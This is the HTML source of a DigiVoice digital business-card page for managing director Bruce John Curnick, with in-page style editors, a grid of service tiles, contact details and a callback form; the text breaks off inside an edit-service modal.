<!doctype html>
<html lang="en">
<head>

    <link rel="apple-touch-icon" sizes="57x57" type="image/png"
          href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="72x72" type="image/png"
          href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="114x114" type="image/png"
          href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="144x144" type="image/png"
          href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="preload shortcut icon"
          href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg" as="image"
          type="image/x-icon">
    <link rel="apple-touch-icon" type="image/png" href="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg">

    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Bruce John Curnick | Managing Director</title>
    <link rel="manifest" href="/manifest.json">
    <link rel="stylesheet" type="text/css" href="/assets/css/main.css?v1.2"/>
    <link rel="apple-touch-icon" href="touch-icon-iphone.png">
    <link rel="apple-touch-icon" sizes="152x152"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="180x180"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="167x167"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>swipeleft demo</title>
<!--    <link rel="stylesheet" href="//code.jquery.com/mobile/1.5.0-alpha.1/jquery.mobile-1.5.0-alpha.1.min.css">-->
    <link rel="stylesheet" href="/assets/css/style.css">
<!--    <script src='/assets/js/plugins/jquery-ui.min.js'></script>-->
    <script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
<!--    <script src="//code.jquery.com/jquery-2.2.4.min.js"></script>-->
    <script src="./assets/jquery-ui-1.12.1/jquery-ui.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.js"></script>

    <script src="//code.jquery.com/mobile/1.5.0-alpha.1/jquery.mobile-1.5.0-alpha.1.min.js"></script>
    <script src='https://kit.fontawesome.com/a076d05399.js'></script>
</head>
<body>
<div id="mobileChecker"><div class="isMobile"></div></div>
<div class="container">
    <!--splitlayout -->
    <div id="splitlayout" class="splitlayout">
        <div class="intro">
            <!-- landing left side-->
            <div class="side side-left" style="background:#182b8a">
                <div class="leftblock">

<!--                    left navigation-->
                    <div class="aboutme">
                        <p class="leftNavText">About me</p>
                        <div class="abouticon">
                            <div data-tags="chevron, navigation" data-pack="android"><i class="arrows fas fa-arrow-left"></i>
                            </div>
                        </div>
                    </div>
<!--                    end of left navigation-->
                    <div class="intro-content">
<!--                        edit size,fonjt-family,color-->
                        <p id="landingHeading" name="landingHeading" class="inline-block">Hi, I am </p>
                        <span class="inline-block landingHeadingTrigger"><i id="landingHeadingTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="landingHeadingEditor" class="editors">
                            <div class="editorCard_item"><div>Text</div><input type="text"></div>
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor"><input
                                                                                            type="color"></div></div>
                            <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize"><input
                                                                                         type="number" ></div></div>
                            <div class="editorCard_item"><div>Font Style</div>
                            <select class="font-style-selector">
                            <option selected>Times New Roman</option>
                            <option>Arial</option>
                            <option>Tahoma</option>
                            </select>
                            </div>
                            <button class="editorSubmitButton btn btn-success" >submit</button>
                            <button class="editorCancelButton btn btn-danger" >Cancel</button>
                        </span>

<!--                        edit size,fonjt-family,color-->
                        <br/>
                        <h1 class="firstNamesLanding inline-block"><span class="inline-block">Bruce John</span></h1>
                        <span class="inline-block firstNameTrigger"><i id="firstNameTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="firstNameEditor" class="editors">
                            <div class="editorCard_item"><div>Text</div><input type="text"></div>
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                <input type="color"></div></div>
                            <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                <input type="number" ></div></div>
                            <div class="editorCard_item"><div>Font Style</div>
                            <select class="font-style-selector">
                            <option selected>Times New Roman</option>
                            <option>Arial</option>
                            <option>Tahoma</option>
                            </select>
                            </div>
                            <button class="editorSubmitButton btn btn-success" >submit</button>
                            <button class="editorCancelButton btn btn-danger" >Cancel</button>
                        </span>

    <!--                        edit size,fonjt-family,color and edit the before with background-->
                        <br/>
                        <h1 class="lastNameLanding inline-block">Curnick</h1></span>
                        <span class="inline-block lastNameTrigger"><i id="lastNameTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="lastNameEditor" class="editors">
                            <div class="editorCard_item"><div>Text</div><input type="text"></div>
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                <input type="color"></div></div>
                            <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                <input type="number" ></div></div>
                            <div class="editorCard_item"><div>Font Style</div>
                            <select class="font-style-selector">
                            <option selected>Times New Roman</option>
                            <option>Arial</option>
                            <option>Tahoma</option>
                            </select>
                            </div>
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                <input type="color"></div></div>
                            <button class="specialLastNameEditorSubmitButton btn btn-success" >submit</button>
                            <button class="editorCancelButton btn btn-danger" >Cancel</button>
                        </span>


                        <br/>
                        <br/>
                        <!--                        edit size,fonjt-family,color-->
                        <h1 class="positionLanding inline-block"> Managing Director </h1>
                        <span class="inline-block jobTitleTrigger"><i id="jobTitleTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="jobTitleEditor" class="editors">
                            <div class="editorCard_item"><div>Text</div><input type="text"></div>
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                <input type="color"></div></div>
                            <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                <input type="number" ></div></div>
                            <div class="editorCard_item"><div>Font Style</div>
                            <select class="font-style-selector">
                            <option selected>Times New Roman</option>
                            <option>Arial</option>
                            <option>Tahoma</option>
                            </select>
                            </div>
                            <button class="editorSubmitButton btn btn-success" >submit</button>
                            <button class="editorCancelButton btn btn-danger" >Cancel</button>
                        </span>

                        <div class="botnav botnav-right">
                            <ul class="nav">
                                <li class="active"><a href="#about" class="hvr-sweep-to-left">About</a></li>
                                <!-- li><a href="#skills" class="hvr-sweep-to-left">My skills</a></li> -->
                                <li><a href="#contact" class="hvr-sweep-to-left">contact</a></li>
                            </ul>
                        </div>

                    </div>

                    <div class="landingAboutPostion">
                        <span class="inline-block  landingAboutMeTrigger"><i id="landingAboutMeTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="landingAboutMeEditor" class="editors">
                              <div class="editorCard_item"><div>Arrow color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <div class="editorCard_item"><div>Text color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                        </span></div>

                    <div class="landingBackgroundCogPostion">
                        <div class=" inline-block landingBackgroundText">Background color</div>
                        <span class="inline-block  landingBackgroundTrigger"><i id="landingBackgroundTrigger" class="fa fa-cog customCog"></i></span>
                        <span id="landingBackgroundEditor" class="editors">
                            <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                <input type="color"></div></div>
                            <button class="editorbgColorSubmitButton btn btn-success" >submit</button>
                            <button class="editorCancelButton btn btn-danger" >Cancel</button>
                        </span></div>

                    <div class="footer">
                        <span class="footer-poweredBy">Powered by</span> <a class="footer-poweredBy-link" href="/Bruce%20John-Curnick" target="_blank">DigiVoice</a>
                    </div>
                </div>

                <div class="overlay"></div>
            </div>
            <!--/landing left-->

            <!--landing right side-->
            <div class="side side-right " style="background: url(/uploads/companypictures/bground-dv5.jpg) no-repeat center top;">

                <div class="background">

                    <span class="inline-block rightlandingBackgroundTrigger">
                                        <i id="rightlandingBackgroundTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                    <span id="rightlandingBackgroundEditor" class="editors">
                                        <div class="editorCard_item">Upload a image (Max 5mbs)</div>
                                       <div class="rightlandingUploadBackground"><input type="file"  accept="image/*" /></div>
                                        <button id="rightlandingBackgroundButton" class="btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                </div>

                <div class="landingServicePosition">
                    <span class="inline-block  landingServiceTrigger"><i id="landingServiceTrigger" class="fa fa-cog customCog"></i></span>
                    <span id="landingServiceEditor" class="editors">
                              <div class="editorCard_item"><div>Arrow color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <div class="editorCard_item"><div>Text color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                        </span></div>
                <div class="rightblock">

<!--       right landing navigation-->
                    <div class="portfolio">
                        <p class="rightNavText">Services</p>
                        <div class="portfolioicon">
                            <div data-tags="chevron, navigation" data-pack="android">
                                <i class="arrows fas fa-arrow-right"></i>
                            </div>
                        </div>
                    </div>
        <!--right landing navigation end-->

                    <div class="intro-content">
                        <p class="white-text">Hi, I am </p>
                        <h1 class="white-text">Bruce John Curnick</h1>
                        <h1 class="white-text">Managing Director</h1>
                        <div class="botnav botnav-left">
                            <ul class="nav">
                                <li class="active"><a href="#portfolio" class="hvr-sweep-to-left">Services</a></li>
                            </ul>
                        </div>
                    </div>

                </div>
                <div class="overlay"></div>
            </div>
            <!-- /landing right slide-->

        </div>

        <!-- page-right -->
        <div class="page page-right" style="background-color:#000000 !important;">
            <!-- page-inner -->
            <!-- page-inner -->
            <div class="page-inner">
                <section id="portfolio">
                    <div class="row">
                        <div class="col-lg-12">
                            <h2 class="white-text right-page-heading">Services</h2>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="portfolioInner">
                                <div class="gallery clearfix">
                                    <div class="grid">
                                        <div class="row">
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-1-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-1-img" name="grid-item-1-img"
                                                        src="/uploads/templatepictures/services-chatbot.png"/>
                                                    <h4 id="grid-item-1-title" name="grid-item-1-title">DigiBot</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-2-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-2-img" name="grid-item-2-img"
                                                        src="/uploads/templatepictures/services-record-sheet.png"/>
                                                    <h4 id="grid-item-2-title" name="grid-item-2-title">Record Sheet</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-3-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-3-img" name="grid-item-3-img"
                                                        src="/uploads/templatepictures/services-analytics.png"/>
                                                    <h4 id="grid-item-3-title" name="grid-item-3-title">Analytics</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-4-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-4-img" name="grid-item-4-img"
                                                        src="/uploads/templatepictures/services-mandate.png"/>
                                                    <h4 id="grid-item-4-title" name="grid-item-4-title">Debit Order</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-5-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-5-img"  name="grid-item-5-img"
                                                        src="/uploads/templatepictures/services-user-manual.png"/>
                                                    <h4 id="grid-item-5-title"  name="grid-item-5-title">User Manual</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-6-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-6-img" name="grid-item-6-img"
                                                        src="/uploads/templatepictures/ab515100ed664073c51e49faea4521d6.png"/>
                                                    <h4 id="grid-item-6-title" name="grid-item-6-title">DEMO - Virtual </h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-7-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-7-img" name="grid-item-7-img"
                                                        src="/uploads/templatepictures/0556d0d303e2221a5b1772a65ca9a804.png"/>
                                                    <h4 id="grid-item-7-title" name="grid-item-7-title">SnapScan</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-8-img"><figure class="effect-apollo right-grid-item><img id="grid-item-8-img" name="grid-item-8-img"
                                                        src="/uploads/templatepictures/812ce33fe31ae8dba15022bd3d358689.png"/>
                                                    <h4 id="grid-item-8-title" name="grid-item-8-title">Brochures</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-9-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-9-img" name="grid-item-9-img"
                                                        src="/uploads/templatepictures/57ea741e871483ee342c006ef3badbc8.png"/>
                                                    <h4 id="grid-item-9-title" name="grid-item-9-title">DEMO - Virtual Showroom</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-10-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-10-img" name="grid-item-10-img"
                                                        src="/uploads/templatepictures/7cb27e6e4b110b14f6349ad035c7028d.png"/>
                                                    <h4 id="grid-item-10-title" name="grid-item-10-title">View Our Presentation</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-11-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-11-img" name="grid-item-11-img"
                                                        src="/uploads/templatepictures/f3c909e10a8f4dcaceae0779d4805cfe.png"/>
                                                    <h4 id="grid-item-11-title" name="grid-item-11-title">Finance Application</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-12-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-12-img" name="grid-item-12-img"
                                                        src="/uploads/templatepictures/service-qrbruce.png"/>
                                                    <h4 id="grid-item-12-title" name="grid-item-12-title">Download my Card</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <a href="#grid-item-13-img"><figure class="effect-apollo right-grid-item"
                                                        ><img id="grid-item-13-img" name="grid-item-13-img"
                                                        src="/uploads/templatepictures/9d900785cb762efe43071ac22ed5c5c6.png"/>
                                                    <h4 id="grid-item-13-title" name="grid-item-13-title">Let&#039;s Chat</h4>
                                                    <p></p>

                                                </figure></a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </section>
            </div>
            <!-- /page-inner -->      <!-- /page-inner -->
        </div>
        <!-- /page-right -->
        <!-- page-left -->
        <div class="page page-left">
            <!-- page-inner -->
            <div class="page-inner">
                <section id="about">
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="about">
                                <!--                        edit size,fonjt-family,color-->
                                <div>
                                <span class="inline-block leftSideHeadingTrigger">
                                    <i id="leftSideHeadingTrigger" class="fa fa-cog customCog"></i>
                                </span>
                                <span id="leftSideHeadingEditor" class="editors">
                                    <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                    <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                        <input type="color"></div></div>
                                    <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                        <input type="number"></div></div>
                                    <div class="editorCard_item"><div>Font Style</div>
                                    <select class="font-style-selector">
                                    <option selected>Times New Roman</option>
                                    <option>Arial</option>
                                    <option>Tahoma</option>
                                    </select>
                                    </div>
                                    <button class="editorSubmitButton btn btn-success">submit</button>
                                    <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <h2 class="left-side-heading inline-block">Hello, my name is Bruce John.</h2>
                                </div>

                                <div class="imgsec"><img id="profile-img" name="profile-img"
                                        class="img-fluid" height="254" width="254"
                                                         src="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg"
                                                         alt="Bruce John">
                                    <span class="inline-block leftSideProfilePicTrigger">
                                        <i id="leftSideProfilePicTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                    <span id="leftSideProfilePicEditor" class="editors">
                                        <div class="editorCard_item">Upload a image (Max 5mbs)</div>
                                       <div class="uploadProfilePic"><input type="file"  accept="image/*" /></div>
                                        <button id="uploadProfilePicButton" class="btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                </div>

                                <div class="left_sec">
                                    <!--                        edit size,fonjt-family,color-->
                                    <p class="font700 inline-block" class="lef-side-description">Ensuring your company is on the cutting edge of technology. </p>
                                    <span class="inline-block leftSideDescriptionTrigger">
                                        <i id="leftSideDescriptionTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                    <span id="leftSideDescriptionEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                    <p></p>
                                    <p></p>
<!--                                    <div>-->
                                    <!--                        background -->

                                    <span class="inline-block leftSideRequestCallTrigger">
                                        <i id="leftSideRequestCallTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                    <span id="leftSideRequestCallEditor" class="editors">
                                        <div class="editorCard_item"><div>Change text color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <div class="editorCard_item"><div>Change background color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                    <a href="#contactform" class="hvr-rectangle-in download_button call-back-button">Request a Call Back</a>

<!--                                    </div>-->
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="clearfix"></div>
                </section>
                <div class="clearfix"></div>
                <div class="row">
                    <div class="col-lg-12">
                        <section id="contact">
                            <!--                        edit size,fonjt-family,color-->
                            <span class="inline-block leftSideContactHeadingTrigger">
                                        <i id="leftSideContactHeadingTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                            <span id="leftSideContactHeadingEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                            <h2 class="contact-heading inline-block">Get in Touch</h2>
                            <br>
                            <!--                        edit size,fonjt-family,color-->
                            <span class="inline-block leftSideContactDescriptionTrigger">
                                        <i id="leftSideContactDescriptionTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                            <span id="leftSideContactDescriptionEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                            <p class="contact-description inline-block">Contact me for any questions or enquiries you may have.</p>

                            <div  class="font600">
                                  <span class="inline-block leftSideContactEmailTrigger">
                                        <i id="leftSideContactEmailTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                <span id="leftSideContactEmailEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number" maxlength="2"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <a name="email" class="contact-details-link inline-block" href="mailto:bruce@digivoice.co.za">bruce@digivoice.co.za</a><br>
                                <br/>
                                <span class="inline-block leftSideContactMobileTrigger">
                                        <i id="leftSideContactMobileTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                <span id="leftSideContactMobileEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <a name="mobileNo" class="contact-details-link" href="tel:0636840131" > 0636840131</a><br/>
                                <br/>
                                <span class="inline-block leftSideContactlandlineTrigger">
                                        <i id="leftSideContactlandlineTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                <span id="leftSideContactLandlineEditor" class="editors">
                                        <div class="editorCard_item"><div>Text</div><input type="text"></div>
                                        <div class="editorCard_item"><div>Change color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <div class="editorCard_item"><div>Font Size</div><div class="editorFontSize">
                                            <input type="number"></div></div>
                                        <div class="editorCard_item"><div>Font Style</div>
                                        <select class="font-style-selector">
                                        <option selected>Times New Roman</option>
                                        <option>Arial</option>
                                        <option>Tahoma</option>
                                        </select>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <a name="landLine" class="contact-details-link" href="tel:0636840131">"landline"</a>
                            </div>
                            <br/>
                                <a name="viewMap" class="contact-details-link" href="https://www.google.com/maps/place/Cape+Town/@-33.9142688,18.0956097,9z/data=!3m1!4b1!4m5!3m4!1s0x1dcc500f8826eed7:0x687fe1fc2828aa87!8m2!3d-33.9248685!4d18.4240553"
                                target="_blank">Click to view on maps.</a>
                            <br>
                            <div class="social_icon">
                                <a name="facebook" class="contact-details-link" href="https://www.facebook.com/johan.oosthuizen.142" class="hvr-shutter-in-vertical"><i
                                        class="fab fa-facebook"></i></a>
                                <a name="linkedin" class="contact-details-link" href="https://www.linkedin.com/in/bruce-curnick-6818208?originalSubdomain=za"
                                   class="hvr-shutter-in-vertical"><i class="fab fa-linkedin"></i></a>
                                <a name="website" class="contact-details-link" href="http://www.digivoice.co.za" class="hvr-shutter-in-vertical"><i
                                        class="fas fa-link"></i></a>
                            </div>


                            <div class="inline-block">
                                <span class="inline-block leftSidesaveContactTrigger">
                                        <i id="leftSidesaveContactTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                <span id="leftSideSaveContactEditor" class="editors">
                                        <div class="editorCard_item"><div>Change background color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <button class="editorbgColorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <a name="saveContact" class="btn btn-success btn-lg contact-details-link"
                                  style="background-color: #000000 !important; border-color: #000000 !important;"
                                  href="/Bruce John-Curnick/vcfdownload" role="button">Save to Contacts</a>
                            </div>

                            <br/>
                            <br/>
                            <div>
                                <span class="inline-block leftSidewhatsappShareTrigger">
                                        <i id="leftSidewhatsappShareTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                <span id="leftSideWhatsappShareEditor" class="editors">
                                        <div class="editorCard_item"><div>Change background color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <button class="editorbgColorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <!--                        edit background color-->
                                <a name="whatsappShare" class="btn btn-success btn-lg contact-details-link"
                                  style="background-color: #000000 !important; border-color: #000000 !important;"
                                  href="whatsapp://send?text=https://dvcard.mobi/Bruce%20John-Curnick"
                                  data-action="share/whatsapp/share">Share via Whatsapp</a>
                            </div>

                            <p class="nomargin">Fill the form below for a quick callback</p>
                            <form name="contactform" action="/Bruce John-Curnick/contact" method="post" class="col-sm-offset-8 col-sm-4">
                                <input name="name" type="text" class="inputbg1" placeholder="Your name" required>
                                <input name="email" type="email" class="inputbg" placeholder="Your email" required>
                                <input name="phone" type="text" class="inputbg" placeholder="Your phone" required>
                                <textarea name="message" class="textareabg" placeholder="Your message"></textarea>

                                <!--                        edit background color-->
                                <div>
                                    <span class="inline-block leftSideSendButtonTrigger">
                                        <i id="leftSideSendButtonTrigger" class="fa fa-cog customCog"></i>
                                    </span>
                                    <span id="leftSideSendButtonEditor" class="editors">
                                        <div class="editorCard_item"><div>Change background color</div><div class="editorColor">
                                            <input type="color"></div></div>
                                        <button class="editorbgColorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>
                                <button type="submit" class="hvr-rectangle-in send_button inline-block">Send</button>
                                </div>
                            </form>
                        </section>
                    </div>
                </div>
            </div>      <!-- /page-inner -->
        </div>

        <!-- /page-left -->
        <a href="#" class="back back-right hvr-pulse" title=" ">&rarr;</a> <a href="#" class="back back-left hvr-pulse"
                                                                              title=" ">&larr;</a>
<!--        <i class='fas fa-robot fixed-bot'></i>-->
<!--        <a class="fixed-bot" href="#">-->
<!--            <i class="far fa-comment-dots"></i>-->
<!--            <div class="fixed-bot-text">Chat here!</div>-->
<!--        </a>-->

        <span class="inline-block landingBotTrigger">
                                        <i id="landingBotTrigger" class="fa fa-cog customCog"></i>
                                    </span>
        <span id="landingBotTriggerEditor" class="editors">
                                        <div class="editorCard_item"><div>Change Icon color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <div class="editorCard_item"><div>Change background color</div>
                                            <div class="editorColor">
                                            <input type="color"></div>
                                        </div>
                                        <button class="editorSubmitButton btn btn-success">submit</button>
                                        <button class="editorCancelButton btn btn-danger">Cancel</button>
                                 </span>

        <a href="#" Class="float" target="_blank">

            <i Class="far fa-comment-dots my-float"></i>
        </a>
        <strong Class="float-text">Chat Here!</strong>

        
    </div>
    <!-- /splitlayout -->
</div>


<!--other imports-->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"
      integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">
<script src="/assets/js/plugins/jquery.appear.min.js"></script>
<script src="/assets/js/plugins/jquery.easing.1.3.min.js"></script>
<script src="/assets/js/plugins/modernizr.custom.min.js"></script>
<script src="/assets/js/plugins/jquery.countTo.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.fancybox.min.js"></script>
<script src="/assets/bootstrap/js/bootstrap.min.js"></script>
<script src="/assets/js/plugins/classie.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.scrollTo.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.localScroll.min.js"></script>
<script src="/assets/js/plugins/cbpSplitLayout.min.js"></script>
<script src="/assets/js/main.js"></script>
<script src="/assets/js/service/AnalyticalService.js"></script>
<script src="/assets/js/swipe.js"></script>
<script src="./assets/js/editingfunctions/landingPageEditingFunc.js"></script>
<script src="./assets/js/editingfunctions/rightPageEditing.js"></script>
<script src="./assets/js/editingfunctions/toggle-editor.js"></script>
<script src="./assets/js/editingfunctions/uploadProfilePhoto.js"></script>
<script src="./assets/js/readfiles.js"></script>


<script>
    $(document).ready(function() {setTimeout(function() {$(".ui-loader").hide(); }, 10);});
</script>
</body>
<!-- Modal -->
<div class="modal fade " id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
     aria-hidden="true">

        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h3 class="modal-title font-black" id="exampleModalLabel">Edit service</h3>
